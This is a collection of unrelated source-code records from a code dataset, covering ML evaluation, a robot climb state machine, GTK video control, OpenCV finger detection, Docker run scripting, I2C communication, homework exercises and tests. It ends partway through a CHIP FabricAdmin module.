'\n s += '\\n \\hline \\n '\n #s += '-------------------------------------------------------\\\\\\ \\n'\n s = scores_to_tabbed_string(s, score_train_r2, score_test_r2, cols)\n s += '\\n \\hline \\n '\n #s += '-------------------------------------------------------\\\\\\ \\n'\n #s += '#### ------ #### \\\\\\ \\n'\n return s\n\ndef evaluate_model(model,data,X_train,X_test,Y_train,Y_test):\n\n cols=model.output_tag_ordered_list\n\n scores={}\n\n y_true_test=data.inverse_transform(Y_test,'Y')[cols]\n y_pred_test=data.inverse_transform(model.predict(X_test),'Y')\n y_pred_test=y_pred_test.set_index(y_true_test.index)\n y_true_train = data.inverse_transform(Y_train, 'Y')[cols]\n y_pred_train = data.inverse_transform(model.predict(X_train), 'Y')\n y_pred_train = y_pred_train.set_index(y_true_train.index)\n\n\n score_test_RMSE = np.sqrt(metrics.mean_squared_error(y_true_test,y_pred_test, multioutput='raw_values'))\n score_train_RMSE = np.sqrt(metrics.mean_squared_error(y_true_train, y_pred_train, multioutput='raw_values'))\n\n score_test_r2 = metrics.r2_score(y_true_test, y_pred_test, multioutput='raw_values')\n score_train_r2 = metrics.r2_score(y_true_train, y_pred_train, multioutput='raw_values')\n\n score_train_mape=MAPE(y_true_train,y_pred_train)\n score_test_mape = MAPE(y_true_test, y_pred_test)\n\n scores['RMSE_train']=pd.Series(data=score_train_RMSE, index=cols)\n scores['RMSE_test']= pd.Series(data=score_test_RMSE, index=cols)\n\n scores['R2_train']= pd.Series(data=score_train_r2, index=cols)\n scores['R2_test'] = pd.Series(data=score_test_r2, index=cols)\n\n scores['MAPE_train'] = pd.Series(data=score_train_mape, index=cols)\n scores['MAPE_test'] = pd.Series(data=score_test_mape, index=cols)\n\n\n return scores\n","sub_path":"model_validation/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326605502","text":"from components.climb import Lift\nfrom magicbot import StateMachine, state, timed_state\n\n\nclass ClimbAutomation(StateMachine):\n\n front_lift: Lift\n back_lift: Lift\n\n @state(must_finish=True)\n def both_lifts_down(self):\n self.front_lift.extend_lift()\n self.back_lift.extend_lift()\n if (\n self.front_lift.get_lift_at_set_pos()\n and self.back_lift.get_lift_at_set_pos()\n ):\n self.next_state_now(\"drive_forward\")\n\n @state(must_finish=True)\n def drive_forward(self):\n self.front_lift.move_wheels_forward()\n self.back_lift.move_wheels_forward()\n\n if self.front_lift.is_touching_podium():\n self.next_state_now(\"front_lift_up\")\n\n @state(must_finish=True)\n def front_lift_up(self):\n self.front_lift.retract_lift()\n if self.front_lift.get_lift_at_set_pos():\n self.next_state_now(\"going_forward\")\n\n @state(must_finish=True)\n def going_forward(self):\n self.back_lift.get_lift_at_set_pos()\n self.back_lift.move_wheels_forward()\n if self.back_lift.is_touching_podium():\n self.next_state_now(\"back_lift_up\")\n\n @state(must_finish=True)\n def back_lift_up(self):\n self.back_lift.retract_lift()\n if self.back_lift.get_lift_at_set_pos():\n self.done()\n","sub_path":"automations/climb.py","file_name":"climb.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156298362","text":"#!/usr/bin/python3\n\"\"\"11-student module\"\"\"\n\n\nclass Student:\n \"\"\"Student class\"\"\"\n def __init__(self, first_name, last_name, age):\n \"\"\"init magic method\"\"\"\n if not isinstance(first_name, str):\n raise TypeError('first_name is of the wrong type')\n elif not isinstance(last_name, str):\n raise TypeError('last_name is of the wrong type')\n if type(age) != int:\n raise TypeError('age is of the wrong type')\n else:\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\"to_json method\"\"\"\n retd = self.__dict__\n if type(attrs) == list:\n if not all(type(x) == str for x in attrs):\n return retd\n return {i: retd[i] for i in attrs if i in retd.keys()}\n else:\n return retd\n\n def reload_from_json(self, json):\n \"\"\"reload_from_json\"\"\"\n if '__dict__' in dir(self) and len(json) > 0:\n self.__dict__ = json\n","sub_path":"0x0B-python-input_output/13-student.py","file_name":"13-student.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172926835","text":"# https://riptutorial.com/gtk3/example/24777/embed-a-video-in-a-gtk-window-in-python3\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('Gst', '1.0')\nfrom gi.repository import Gtk, Gst # ,GObject\nfrom view import myView\nfrom model import myModel\n\n\nGst.init(None)\nGst.init_check(None)\n\n\nclass myController(object):\n def __init__(self, view, model):\n self._view = view\n self._model = model\n self._view.connect('button-addChannel-clicked', self._addVideo)\n self._view.connect('button-startChannel-clicked', self._startVideo)\n self._view.connect('button-stopChannel-clicked', self._stopVideo)\n self._view.connect('combobox-input-changed', self._inputChanged)\n # self._view.connect('destroy', self.on_destroy)\n self._view.connect('button-addClient-clicked', self._addClient)\n\n def on_destroy(self, win):\n # print(\"bye bye\")\n Gtk.main_quit()\n\n def _addVideo(self, button):\n print(\"add video\")\n # model\n channelNum = self._model._createChannel()\n print(f\"channel {channelNum} created\")\n # self._channels.append(channel)\n # pass sink to view\n _gtksink = self._model._getGtksink(channelNum) # TODO remove + dependent\n self._view._addVideoView(channelNum)\n # self._view._setVideoView(gtksink, channelNum)\n\n\n\n def _startVideo(self, button, channelNum):\n print(\"starting video\", channelNum)\n # channel = self._channels[arg]\n # channel._stop()\n self._model._play(channelNum)\n\n def _stopVideo(self, button, channelNum):\n print(\"stopping video\", channelNum)\n # channel = self._channels[arg]\n self._model._stop(channelNum)\n # channel._play()\n\n def _inputChanged(self, combo, channelNum, inputType):\n print(\"input changed\")\n # print(combo)\n print(\"channel\", channelNum)\n print(\"input\", inputType)\n\n # Model - create channel\n self._model._setInput(channelNum, inputType)\n\n # pass sink to view\n _gtksink = self._model._getGtksink(channelNum)\n # self._view._addVideoView(_gtksink)\n\n self._view._setVideoView(_gtksink, channelNum)\n\n def _addClient(self, button, channelNum, ip, port):\n print(f\"controller: channel {channelNum} add client\", ip, port)\n self._model._addClient(channelNum, ip,port)\n\n\n\n\nif __name__ == \"__main__\":\n # window = Gtk.ApplicationWindow()\n\n view = myView()\n model = myModel()\n\n # vbox = Gtk.VBox()\n\n # window\n # window.add(vbox)\n\n # model\n controller = myController(view, model)\n\n # Create a gstreamer pipeline with no sink. \n # A sink will be created inside the GstWidget.\n # widget = GstWidget('videotestsrc')\n # widget.set_size_request(200, 200)\n\n # vbox.add(widget)\n # button = Gtk.Button(\"Start\")\n # button.connect(\"clicked\", controller.addVideo)\n # vbox.add(button)\n\n # window.show_all()\n\nGtk.main()\n","sub_path":"server/gstreamer/python/app6/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"108021681","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom data_app.models import Movie, Rating, User\nimport pandas as pd\n\n\ndef load_movie_data(apps, schema_editor):\n datus = pd.read_csv('some_data/movies.dat', encoding='windows-1252',\n sep='::', engine='python',\n names=[\"id\", \"title\", 'genres'])\n\n for row in datus.iterrows():\n movie_object = row[1]\n Movie.objects.create(m_id=movie_object.id,\n title=movie_object.title,\n genres=movie_object.genres)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('data_app', '0003_auto_20150701_0401'),\n ]\n\n operations = [\n migrations.RunPython(load_movie_data)\n ]\n","sub_path":"movieratings/data_app/migrations/0004_auto_20150701_0402.py","file_name":"0004_auto_20150701_0402.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"30072135","text":"import json\nimport numpy as np\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import confusion_matrix\n\n# method that loads nencessay data from json\n# model: \"bidir_dag_lstm\" or \"gs_lstm\"\n# dataset: \"train\" or \"validate\" or \"test\"\n# analysis: \"accuracy\"or \"entity\"\ndef load_data (model, dataset):\n\n if model == \"randomforest\":\n data_path = \"./bidir_dag_lstm_result/random_forest/result_raw.json\"\n else:\n data_path = \"../result/\" + model + \"/logs/\" + dataset + \"/result.json\"\n \n print(\"Fetching data from \" + data_path)\n\n with open(data_path) as f:\n json_file = json.load(f)\n\n answer = json_file[\"answer\"]\n output = json_file[\"output\"]\n entity = json_file[\"entity\"]\n return (answer, output, entity)\n\ndef get_tsne (entity):\n X = np.asarray(entity)\n # print(\"entity has a shape of\", X.shape)\n\n model = TSNE(learning_rate = 100)\n # print(\"calculating TSNE...\")\n transformed = model.fit_transform(X)\n\n return transformed.tolist()\n\n\ndef get_label_frequency():\n\n binary_train = \"../result/binary/logs/train/result.json\"\n binary_test = \"../result/binary/logs/test/result.json\"\n multi_train = \"../result/multi/logs/train/result.json\"\n multi_test = \"../result/multi/logs/test/result.json\"\n path_list =[binary_train, binary_test, multi_train, multi_test]\n\n result = {}\n for p in path_list:\n with open(p) as f:\n json_file = json.load(f)\n \n answer = json_file[\"answer\"]\n label = set(answer)\n\n freq = {}\n for l in label:\n temp = answer.count(l)\n freq[str(l)] = temp\n \n result[p]= freq\n\n return result\n\ndef analyze(model, dataset):\n print(\"working on \" + model)\n\n answer, output, entity = load_data(model, dataset)\n # confusion_matrix = get_confusion_matrix(answer, output)\n # normalized_conf = normalize_confusion_matrix(confusion_matrix)\n tsne_values = get_tsne(entity)\n\n result = {}\n\n result[\"answer\"] = answer\n result[\"output\"] = output\n result[\"tsne\"] = tsne_values\n\n if model == \"randomforest\":\n path = \"./bidir_dag_lstm_result/random_forest/\" + dataset + \"/result.json\"\n else:\n path = \"./bidir_dag_lstm_result/\" + model + \"/\" + dataset + \"/result.json\"\n\n json.dump(result, open(path, 'w'))\n\n\nif __name__ == \"__main__\":\n\n # model = [\"binary\", \"multi\"]\n # dataset = [\"train\", \"test\"]\n \n # for i in range(len(model)):\n # m = model[i]\n # analyze(m, dataset[1])\n\n # analyze(model='randomforest', dataset='test')\n \n result = get_label_frequency()\n print(result)\n","sub_path":"visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307789455","text":"import cv2\nimport numpy as np\n\ndef detection1(file_path, debug=False):\n '''\n Determine the presense of fingers in an image for a given file path\n\n Positional arguments:\n file_path -- path to image file\n \n Keyword arguments:\n debug -- is True show images of various steps to display with contours added (default False)\n\n Returns:\n List of ellipses that match criteria\n '''\n image = cv2.imread(sample, 1)\n\n # convert to greyscale colour domain\n grey = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # denoising techniques\n\n # adaptive thresholding\n ADAPTIVE_THRESHOLD_BLOCK_SIZE = 121\n ADAPTIVE_THRESHOLD_C_VAL = 10\n\n thresh = cv2.adaptiveThreshold(grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY_INV, \n ADAPTIVE_THRESHOLD_BLOCK_SIZE, \n ADAPTIVE_THRESHOLD_C_VAL)\n \n # applying morphological transformations: closing followed by opening\n CLOSING_KERNEL = np.ones((5, 5), np.float32)/25\n OPENING_KERNEL = np.ones((5, 5), np.float32)/25\n\n closed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, CLOSING_KERNEL)\n opened = cv2.morphologyEx(closed, cv2.MORPH_OPEN, OPENING_KERNEL)\n\n # find contours\n contours, hierarchy = cv2.findContours(opened,\n cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n\n # limit contour based on the height and width dimentions of matching ellipses\n DIMENSION_THRESHOLD_LOWER = 15\n DIMENSION_THRESHOLD_UPPER = 200\n\n ellipse_list = []\n\n for contour in contours:\n if len(contour) >= 5:\n ellipse = cv2.fitEllipse(contour)\n if (ellipse[1][0] > DIMENSION_THRESHOLD_LOWER and \n ellipse[1][0] < DIMENSION_THRESHOLD_UPPER and\n ellipse[1][1] > DIMENSION_THRESHOLD_LOWER and\n ellipse[1][1] < DIMENSION_THRESHOLD_UPPER):\n ellipse_list.append(ellipse)\n\n if debug:\n original = image[:].copy()\n cv2.imshow('thresh', thresh)\n\n cv2.drawContours(image, contours, -1, (0, 255, 0), 3)\n\n for ellipse in ellipse_list:\n cv2.ellipse(image, ellipse, (0, 0, 255), 3)\n\n cv2.imshow('closed', closed)\n cv2.imshow('opened', opened)\n final = np.hstack((original, image))\n cv2.imshow('final', final)\n cv2.waitKey(0)\n modified_file_path = file_path.split('.')[0] + '_modified.png'\n # cv2.imwrite(modified_file_path, final)\n cv2.destroyAllWindows()\n\n return ellipse_list\n\n\nif __name__ == '__main__':\n from glob import glob\n samples = glob('capture*.png')\n\n for sample in samples:\n detection1(sample, debug=True)\n","sub_path":"cvTests/detection1.py","file_name":"detection1.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359842441","text":"class Character():\n\tdef __init__(self):\n\t\tself.name = ''\n\t\tself.gender = ''\n\t\tself.job = ''\n\t\tself.level = 0\n\t\tself.equipment = []\n\t\tself.inventory = []\n\t\tself.skills = []\n\n\tdef changeWeapon(self, equip):\n\t\tself.equipment[0] = equip\n\n\tdef changeHead(self, equip):\n\t\tself.equipment[1] = equip\n\n\tdef changeArmor(self, equip):\n\t\tself.equipment[2] = equip\n\n\tdef addSkill(self, skill):\n\t\tself.skills.append(skill)\n\n\tdef save(self):\n\t\tdata = [self.name, self.gender, self.job, self.level, self.equipment, self.inventory, self.skills]\n\t\tindex = 0\n\t\twith open('character.save', 'w') as file:\n\t\t\tfor i in data:\n\t\t\t\tif index < 4:\n\t\t\t\t\tfile.write(str(i)+'\\n')\n\t\t\t\tif index == 4:\n\t\t\t\t\tfile.write('EQUIPMENT\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tif index == 5:\n\t\t\t\t\tfile.write('INVENTORY\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tif index == 6:\n\t\t\t\t\tfile.write('SKILLS\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tindex += 1\n\n\tdef load(self):\n\t\tflag = 'none'\n\t\tindex = 0\n\t\twith open('character.save', 'r') as file:\n\t\t\tdata = file.read().splitlines()\n\t\t\tfor i in data:\n\t\t\t\tif index == 0:\n\t\t\t\t\tself.name = i\n\t\t\t\tif index == 1:\n\t\t\t\t\tself.gender = i\n\t\t\t\tif index == 2:\n\t\t\t\t\tself.job = i\n\t\t\t\tif index == 3:\n\t\t\t\t\tself.level = int(i)\n\t\t\t\tif index > 3:\n\t\t\t\t\tif i == 'EQUIPMENT':\n\t\t\t\t\t\tflag = 'eq'\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif i == 'INVENTORY':\n\t\t\t\t\t\tflag = 'inv'\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif i == 'SKILLS':\n\t\t\t\t\t\tflag = 'sk'\n\t\t\t\t\t\tcontinue\n\t\t\t\tif flag == 'eq':\n\t\t\t\t\tself.equipment.append(i)\n\t\t\t\tif flag == 'inv':\n\t\t\t\t\tself.inventory.append(i)\n\t\t\t\tif flag == 'sk':\n\t\t\t\t\tself.skills.append(i)\n\t\t\t\tindex += 1\n\n\t# This is for testing purposes\n\tdef printData(self):\n\t\tprint(\"\\nThis is your character:\")\n\t\tprint(\"Name: \" + self.name)\n\t\tprint(\"Gender: \" + self.gender)\n\t\tprint(\"Class: \" + self.job)\n\t\tprint(\"Level: \" + str(self.level))\n\t\tprint(\"Equipment: \" + str(self.equipment))\n\t\tprint(\"Inventory: \" + str(self.inventory))\n\t\tprint(\"Skills: \" + str(self.skills))\n\t\tprint(\"\")\n\t\t\n","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"277926800","text":"#!/usr/bin/env python\n# 시크릿이 들어간 도커 컨테이너 실행(로컬)\nimport argparse\nimport subprocess\n\n# argparser 사용방법\n# 1. argparser 객체 생성하기 ----> parser = argparser.ArgumentParser()\n# 2. argument 추가하기 ----> parser.add_argument()\n\n# ArgumentParser 객체 생성\nparser = argparse.ArgumentParser()\n\n# 각 cli 인자가 어떻게 파싱될지 지정\nparser.add_argument(\n \"cmd\",\n type=str, # 사용자가 입력한 CLI(기본으로 문자열)을 타입 케스팅 해준다.\n nargs=argparse.REMAINDER # arguments 의 개수. 총 몇개의 argument 를 사용자가 지정할지 말해준다.\n)\n\n# add_argument 로 지정한 내용을 적용\nargs = parser.parse_args()\n\nDOCKER_OPTIONS = [\n ('--rm', ''),\n ('-it', ''),\n ('-d', ''),\n ('-p', '8001:80'), # 컨테이너 내부의 80번과 연결\n ('--name', 'instagram'),\n]\n\nDOCKER_IMAGE_TAG = 'eqfwcev123/docker-wps12'\n\n# poetry export로 docker build시 사용할 requirements.txt 작성\nsubprocess.run(f'poetry export -f requirements.txt > requirements.txt', shell=True)\n\n# 도커 컴퓨터 생성(Secrets.json 이 없는 이미지를 build)\nsubprocess.run(f'docker build -t {DOCKER_IMAGE_TAG} -f Dockerfile .', shell=True)\n# 기존에 실행중인 name=instagram인 컨테이너 실행 중지\nsubprocess.run(f'docker stop instagram', shell=True)\n\n# secrets.json이 없는 상태로 docker run으로 bash를 실행 -> background로 들어감\n# 이전에 설치한 도커 컴퓨터 실행\nsubprocess.run('docker run {options} {tag} /bin/bash'.format(\n options=' '.join([\n f'{key} {value}' for key, value in DOCKER_OPTIONS\n ]),\n tag=DOCKER_IMAGE_TAG,\n), shell=True)\n\n# 실행중인 도커 컴퓨터에 secrets.json을 전송. 경로는 instagram 이미지 내부의 /srv/instagram 디렉토리\nsubprocess.run('docker cp secrets.json instagram:/srv/instagram', shell=True)\n\n# collectstatic 을 subproces.run ��� 이용해서 자동 실행 시키기\nsubprocess.run('docker exec -it instagram ./manage.py collectstatic', shell=True)\n\n# 실행중인 name=instagram 인 컨테이너에서 argparse로 입력받은 cmd또는 bash를 실행(foreground 모드)\nsubprocess.run('docker exec -it instagram {cmd}'.format(\n cmd=' '.join(args.cmd) if args.cmd else 'supervisord -c ../.config/supervisord.conf -n'\n), shell=True)\n","sub_path":"docker-run-secrets.py","file_name":"docker-run-secrets.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"118883013","text":"from manimlib.imports import *\n\n\"\"\"Recode the entire thing. It doesn't work at all\"\"\"\n\nclass DoublePendulum(Scene):\n CONFIG = {\n 'm1': 1,\n 'dot1': Dot(),\n 'line1': Line(),\n 'l1': 1,\n 'theta1': PI/2,\n 'v1': 0,\n\n 'm2': 2,\n 'dot2': Dot(),\n 'line2': Line(),\n 'l2': 1,\n 'theta2': PI/2,\n 'v2': 0,\n 'g': 1\n }\n def update(self):\n num1 = -self.g*(2*self.m1 + self.m2)*np.sin(self.theta1)\n num2 = -self.m2*self.g*np.sin(self.theta1 - 2*self.theta2)\n num3 = 2*np.sin(self.theta1 - self.theta2)*self.m2\n num4 = (self.v2 ** 2) * self.l2 + (self.v1 ** 2) * self.l1 * np.cos(self.theta1 - self.theta2)\n den = self.l1 * (2*self.m1 + self.m2 - self.m2*np.cos(2*(self.theta1 - self.theta2)))\n a1 = (num1 + num2 + num3 * num4) / den\n\n self.v1 += a1 * 0.001\n self.theta1 += self.v1\n\n self.dot1.move_to(RIGHT * self.l1 * np.sin(self.theta1) + DOWN * self.l1 * np.cos(self.theta1))\n self.line1.put_start_and_end_on(ORIGIN, self.dot1.get_center())\n self.dot2.move_to(self.dot1.get_center() + RIGHT * self.l2 * np.sin(self.theta2) + DOWN * self.l2 * np.cos(self.theta2))\n self.line2.put_start_and_end_on(self.dot1.get_center(), self.dot2.get_center())\n\n def construct(self):\n self.dot1.move_to(RIGHT * self.l1 * np.sin(self.theta1) + DOWN * self.l2 * np.cos(self.theta2))\n self.dot2.move_to(self.dot1.get_center() + RIGHT * self.l2 * np.sin(self.theta2) + DOWN * self.l2 * np.cos(self.theta2))\n\n self.line1.put_start_and_end_on(ORIGIN, self.dot1.get_center())\n self.line2.put_start_and_end_on(self.dot1.get_center(), self.dot2.get_center())\n\n self.add(self.dot1, self.dot2, self.line1, self.line2)\n self.wait(1)\n self.dot1.add_updater(lambda d: self.update())\n self.wait(5)\n","sub_path":"Projects/Tests/ChaoticPendulums.py","file_name":"ChaoticPendulums.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610956190","text":"from quick2wire.i2c import I2CMaster, writing_bytes, reading\nimport time\n\nimport struct\nfrom collections import namedtuple\n\naddress = 0x04\n\nif __name__==\"__main__\":\t\t\n\twith I2CMaster() as master:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tvalue = int(str(input(\"Enter 0 - 255:\")).strip())\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tmaster.transaction(writing_bytes(address,value))\n\t\t\ttime.sleep(1)\n\t\t\t\n\t\t\tsensors = master.transaction(reading(address, 8))[0]\n\t\t\tprint(sensors)\n\t\t\tSensors = namedtuple(\"Sensors\", \"A0 A1 A2 A3\")\n\t\t\ts = Sensors._make(struct.unpack(\"\" ))\n \n # Opt 1; comment this out to run Opt 2 or 3\n #d = digit_sum(nums)\n \n # Opt 2; comment this out to run Opt 1 or 3\n [ digit_sum(num) for num in [ map(int,str(nums)) ] ]\n \n \n \n \nif __name__ == \"__main__\": main()","sub_path":"Exercises/Sections-2_2-2_10/ex-2_6-sum-of-ints.py","file_name":"ex-2_6-sum-of-ints.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632872925","text":"from custom.ilsgateway.tanzania.reminders import ARRIVED_HELP, ARRIVED_DEFAULT, ARRIVED_KNOWN\nfrom custom.ilsgateway.tests.handlers.utils import ILSTestScript\n\n\nclass ILSArrivedTest(ILSTestScript):\n\n def setUp(self):\n super(ILSArrivedTest, self).setUp()\n self.user_fac1.language = 'en'\n self.user_fac1.save()\n\n def test_arrived_help(self):\n msg = \"\"\"\n 5551234 > arrived\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_HELP))\n self.run_script(msg)\n\n def test_arrived_unknown_code(self):\n msg = \"\"\"\n 5551234 > arrived NOTACODEINTHESYSTEM\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_DEFAULT))\n self.run_script(msg)\n\n def test_arrived_known_code(self):\n msg = \"\"\"\n 5551234 > arrived loc1\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_KNOWN) % {'facility': self.loc1.name})\n self.run_script(msg)\n\n def test_arrived_with_time(self):\n msg = \"\"\"\n 5551234 > arrived loc1 10:00\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_KNOWN % {'facility': self.loc1.name}))\n self.run_script(msg)\n","sub_path":"custom/ilsgateway/tests/handlers/arrived.py","file_name":"arrived.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566380305","text":"from unittest import mock\n\nfrom jsonapi_requests import data\nfrom jsonapi_requests import orm\n\n\nclass TestField:\n def test_field_equivalence(self):\n import uuid\n\n class UuidField(orm.AttributeField):\n def deserialize(self, json_value):\n return uuid.UUID(json_value)\n\n def serialize(self, value):\n return str(value)\n\n class Test(orm.ApiModel):\n class Meta:\n type = 'test'\n value = UuidField(source='value')\n\n test = Test()\n val = uuid.uuid4()\n test.value = val\n assert test.value is val\n\n def test_custom_field_serialization(self):\n mock_api = mock.MagicMock()\n mock_api.endpoint.return_value.post.return_value.status_code = 201\n mock_api.endpoint.return_value.post.return_value.content.data = data.JsonApiObject(\n type='test',\n id='123',\n attributes={'name': 'alice', 'extra': '0x1000'}\n )\n orm_api = orm.OrmApi(mock_api)\n\n class HexField(orm.AttributeField):\n def deserialize(self, json_value):\n return int(json_value, 16)\n\n def serialize(self, value):\n return hex(value)\n\n hex_field = HexField(source='extra')\n\n # NOTE: assert_not_called() isn't used for py3.4 compatibility in this test\n decode_spy = mock.patch.object(HexField, 'deserialize', wraps=hex_field.deserialize).start()\n encode_spy = mock.patch.object(HexField, 'serialize', wraps=hex_field.serialize).start()\n\n class Test(orm.ApiModel):\n class Meta:\n api = orm_api\n type = 'test'\n name = orm.AttributeField(source='name')\n extra = hex_field\n\n test = Test()\n test.name = 'alice'\n test.extra = 1024\n assert test.extra == 1024\n\n # verify that we can successfully change the value and re-read it\n test.extra = 2048\n assert test.extra == 2048\n\n # nothing should have been decoded at this point -- the reads (for assert) should have been cached\n assert not decode_spy.called\n # should have done an encode for each set\n encode_spy.assert_has_calls([mock.call(1024), mock.call(2048)], any_order=False)\n encode_spy.reset_mock()\n\n test.save()\n\n mock_api.endpoint.return_value.post.assert_called_with(\n object=data.JsonApiObject.from_data(\n {\n 'type': 'test',\n 'attributes': {'name': 'alice', 'extra': '0x800'}\n }\n )\n )\n\n # no further encoding/decoding should have happened\n decode_spy.assert_has_calls([])\n decode_spy.assert_has_calls([])\n\n # verify that the new value that the API returned was set and decoded properly\n assert test.extra == 4096\n decode_spy.assert_called_once_with('0x1000')\n decode_spy.reset_mock()\n\n # read the property again but check that we didn't re-decode it\n assert test.extra == 4096\n assert not decode_spy.called\n","sub_path":"tests/test_field.py","file_name":"test_field.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397873510","text":"# Задание-1:\n# Вывести символы в нижнем регистре, которые находятся вокруг\n# 1 или более символов в верхнем регистре.\n# Т.е. из строки \"mtMmEZUOmcq\" нужно получить ['mt', 'm', 'mcq']\n# Решить задачу двумя способами: с помощью re и без.\n\"\"\"\n#с re\n\nimport re\n\nfoo = \"mtMmEZUOmcq\"\nlow_foo = re.findall(r\"([a-z]+)\", foo)\nprint(low_foo)\n\n#без re\n\nbar = \"mtMmEZUOmcq\"\nbar = list(bar)\nfor letters in bar:\n if letters.isupper():\n bar[bar.index(letters)] = \".\"\nbar = ''.join(bar)\nbar = bar.split(\".\")\nlower_letters = [letters_lower for letters_lower in bar if letters_lower.islower()]\nprint(lower_letters)\n\"\"\"\n\n# Задание-2:\n# Вывести символы в верхнем регистре, слева от которых находятся\n# два символа в нижнем регистре, а справа два символа в верхнем регистре.\n# Т.е. из строки\n# \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\n# нужно получить список строк: ['AY', 'NOGI', 'P']\n# Решить задачу двумя способами: с помощью re и без.\n\"\"\"\nimport re\n\nletters = \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\npattern = (r\"[a-z]{2}([A-Z]+)[A-Z]{2}\")\nnew_letters = re.findall(pattern, letters)\nprint(new_letters)\n\"\"\"\n\n#без re (попытался попробовать предыдущим способом, как задаче 1 =) )\n\nbar = \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\nbar = list(bar)\nfor letters in bar:\n if letters.islower():\n bar[bar.index(letters)] = \".\"\nbar = ''.join(bar)\nbar = bar.split(\".\")\nisupper_letters = [letters_isupper for letters_isupper in bar if letters_isupper.isupper()]\nprint(isupper_letters)\n\n\n\n# Задание-3:\n# Напишите скрипт, заполняющий указанный файл (самостоятельно задайте имя файла)\n# произвольными целыми цифрами, в результате в файле должно быть\n# 2500-значное произвольное число.\n# Найдите и выведите самую длинную последовательность одинаковых цифр\n# в вышезаполненном файле.\n\n","sub_path":"lesson_04/home_work/hw04_normal.py","file_name":"hw04_normal.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296311558","text":"#\n# Copyright (c) 2021 Project CHIP Authors\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Needed to use types in type hints before they are fully defined.\nfrom __future__ import annotations\n\nimport ctypes\nfrom dataclasses import dataclass, field\nfrom typing import *\nfrom ctypes import *\nfrom rich.pretty import pprint\nimport json\nimport logging\nimport builtins\nimport base64\nimport chip.exceptions\nfrom chip import ChipDeviceCtrl\nimport copy\n\n\nclass FabricAdmin:\n ''' Administers a specific fabric as identified by the tuple of RCAC subject public key and Fabric ID.\n The Fabric ID can be passed into the constructor while the RCAC and ICAC are generated.\n The Fabric ID *does not* have to be unique across multiple FabricAdmin instances as\n it is scoped to the key pair used by the root CA and whose public key is in the RCAC.\n\n Each admin is identified by an 'admin index' that is unique to the running\n process. This is used to store credential information to disk so that\n it can be easily loaded later if 